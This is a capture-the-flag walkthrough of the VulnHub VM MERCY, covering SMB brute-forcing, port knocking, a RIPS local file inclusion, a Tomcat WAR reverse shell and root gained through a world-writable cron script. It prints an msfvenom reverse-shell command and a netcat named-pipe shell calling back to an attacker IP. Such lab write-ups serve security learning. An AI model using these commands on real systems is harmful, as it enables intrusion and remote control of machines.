This post documents the complete walkthrough of digitalworld.local: MERCY, a boot2root VM created by Donavan, and hosted at VulnHub. If you are uncomfortable with spoilers, please stop reading now.

Background

The author feels bittersweet about this box. On one hand, it was a box designed as a dedication to the sufferance put through by the Offensive Security team for PWK. I thought I would pay it forward by creating a vulnerable machine too. This is not meant to be a particularly difficult machine, but is meant to bring you through a good number of enumerative steps through a variety of techniques.

Information Gathering

Let’s start with a nmap scan to establish the available services in the host.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.20.130
...
PORT     STATE    SERVICE     REASON              VERSION
22/tcp   filtered ssh         port-unreach ttl 64
53/tcp   open     domain      syn-ack ttl 64      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
80/tcp   filtered http        port-unreach ttl 64
110/tcp  open     pop3        syn-ack ttl 64      Dovecot pop3d
|_pop3-capabilities: SASL UIDL CAPA STLS PIPELINING AUTH-RESP-CODE RESP-CODES TOP
|_ssl-date: TLS randomness does not represent time
139/tcp  open     netbios-ssn syn-ack ttl 64      Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open     imap        syn-ack ttl 64      Dovecot imapd (Ubuntu)
|_imap-capabilities: IMAP4rev1 IDLE OK listed have post-login more capabilities ENABLE Pre-login LOGINDISABLEDA0001 LITERAL+ LOGIN-REFERRALS SASL-IR STARTTLS ID
|_ssl-date: TLS randomness does not represent time
445/tcp  open     netbios-ssn syn-ack ttl 64      Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open     ssl/imaps?  syn-ack ttl 64
|_ssl-date: TLS randomness does not represent time
995/tcp  open     ssl/pop3s?  syn-ack ttl 64
|_ssl-date: TLS randomness does not represent time
8080/tcp open     http        syn-ack ttl 64      Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat

Whoa! Samba is up. Haven’t seen that in a while. Along with it, you can also see 22/tcp and 80/tcp filtered by the firewall. In any case, let’s focus on the Apache Tomcat first since nmap finds the presence of a disallowed entry /tryharder/tryharder in robots.txt.

901bdbd2.png

Looks like base64 to me. Let’s decode it and see what it says.

7afb37cc.png

Duh?! Nothing useful at the moment.

Now, let’s switch our attention to the Tomcat installation.

5e58c8b0.png

From my experience, entering the manager webapp requires authentication. I’m not even going to try that, having no information of the usernames and passwords whatsoever.

Tomcat is a shit-show. Time to go over to Samba.

Samba 4.3.11

One can list down the services available in Samba with smbclient like so.

789d6f24.png

What do we have here? A Samba share! Woohoo. Let’s see if we can mount it without credentials.

0d0cd907.png

Oops! I recall hydra is able to crack SMB passwords online. Time to give it a shot.

I’m assuming the username is qiu.

b7918310.png

That was fast!

c26b7415.png

Not too bad, I must say.

Open Sesame

The .private directory offers some important system information as follows.

93160038.png

Well well well. Port-knocking. Let’s write a port-knocking script, using nmap to do the deed.

knock.sh
#!/bin/bash

TARGET=$1
PORTS=$2

for ports in $(tr ',' ' ' <<<"$PORTS"); do
    echo "[*] Trying sequence $ports..."
    for p in $(echo $ports | tr ',' ' '); do
        nmap -n -v0 -Pn --max-retries 0 -p $p $TARGET
    done
done

Open HTTP

4bd8b4f1.png

Open SSH

f25408df.png

With two more open ports, let’s get down to business.

f573f6ed.png

I’m not amused… Moving on with the exploration, I find the presence of RIPS 0.53 as follows.

f8012b3d.png

According to EDB-ID 18660, RIPS 0.53 is susceptible to multiple local file inclusion (LFI) vulnerabilities. Let’s check it out.

b82d6fca.png

It’s an LFI alright.

Tomcat Revisit

We can expose the passwords in tomcat-users.xml by making use of the LFI vulnerability.

3f5186f0.png

Armed with the credentials, we can now log in to the manager webapp to deploy our evil webapp, a WAR file that allows a reverse shell callback.

133aa32a.png

We can use msfvenom to generate such a WAR file like so.

# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f war -o evil.war

By the way, we are dealing with a 32-bit Ubuntu.

37d41566.png

I’ve successfully deployed the webapp.

2c7236f3.png

On one hand, set up your nc listener. On the other hand, look for the JSP page to access in the WAR file like so.

607da0fe.png

To access the malicious webapp, enter the following into your browser’s address bar:

http://192.168.20.130/evil/tudvpurwgjh.jsp

I humbly present a low-privilege shell.

74e9999e.png

Before I forget, the proof of a low-privilege shell is at /local.txt.

40848530.png

Privilege Escalation

I found out that I can log in to fluffy’s account with the password retrieved from tomcat-users.xml. And during enumeration, I also found out the way to escalate privilege to root.

There’s a script at /home/fluffy/.private/secrets/timeclock that will run every three minutes (under root privilege) to write the current date to /var/www/html/time. The script is world-writable.

I append the following command to the script.

$ echo "rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.20.128 5555 1>/tmp/p" >> timeclock

Set up another nc listener at 5555/tcp. Three minutes later, I have root shell.

7c7b76af.png

Before I forget, here’s the proof that I’m root.

d818319a.png

:dancer: